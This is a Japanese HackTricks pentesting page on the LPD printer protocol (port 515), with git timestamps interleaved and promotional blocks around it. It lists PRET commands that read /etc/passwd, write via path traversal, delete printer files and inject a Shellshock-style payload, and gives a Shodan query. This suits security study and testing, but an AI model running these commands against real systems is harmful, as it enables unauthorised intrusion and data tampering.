2022-04-28 16:01:33 +00:00
< details >
2024-01-12 08:20:35 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をご覧ください!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-12 08:20:35 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-12 08:20:35 +00:00
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションをチェックする
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )で**フォローする**。
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
2022-04-28 16:01:33 +00:00
< / details >
2024-01-12 08:20:35 +00:00
Line Printer Daemon (LPD) プロトコルは元々80年代のBerkeley Unixで導入されました( 後にRFC1179によって規定されました) 。\
デーモンは515/tcpポートで実行され、`lpr`コマンドを使用してアクセスできます。印刷するには、クライアントはジョブ/ユーザー名を定義する**コントロールファイル**と、印刷される実際のデータを含む**データファイル**を送信します。データファイルの**入力タイプ**は、**様々なファイル形式**の中からコントロールファイルで設定できます。しかし、印刷データの実際の処理方法はLPDの実装次第です。Unix系オペレーティングシステムのための人気なLPD実装にはLPRngがあります。LPDは、**悪意のあるPostScript**や**PJLプリントジョブ**を展開するためのキャリアとして使用されることがあります。
2020-07-15 15:43:14 +00:00
2024-01-12 08:20:35 +00:00
`lpdprint` と`lpdtest`ツールは[**PRET**](https://github.com/RUB-NDS/PRET)に含まれています。これらはLPD対応プリンターに直接データを印刷したり、ファイルのダウンロード/アップロード/削除などを行うための最小限の方法です:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
lpdprint.py hostname filename
2020-07-28 00:00:37 +00:00
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local
2020-07-15 15:43:14 +00:00
```
2024-01-12 08:20:35 +00:00
プリンターのハッキングについてもっと学びたい場合は、[**このページを読んでください**](pentesting-printers/)。
2020-07-15 15:43:14 +00:00
2022-05-01 12:49:36 +00:00
# Shodan
2020-10-05 17:40:56 +00:00
2024-01-12 08:20:35 +00:00
* `port 515`
2022-04-28 16:01:33 +00:00
< details >
2024-01-12 08:20:35 +00:00
< summary > < strong > AWSハッキングをゼロからヒーローまで学ぶには< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > をチェックしてください!< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-12 08:20:35 +00:00
HackTricksをサポートする他の方法:
2022-04-28 16:01:33 +00:00
2024-01-12 08:20:35 +00:00
* あなたの**会社をHackTricksに広告掲載したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式のPEASS & HackTricksグッズ** ](https://peass.creator-spring.com )を手に入れましょう。
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見してください。私たちの独占的な[**NFTコレクション**](https://opensea.io/collection/the-peass-family)です。
* 💬 [**Discordグループ** ](https://discord.gg/hRep4RUj7f )や[**テレグラムグループ**](https://t.me/peass)に**参加するか**、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )を**フォローしてください。**
* [**HackTricks** ](https://github.com/carlospolop/hacktricks )と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください。**
2022-04-28 16:01:33 +00:00
< / details >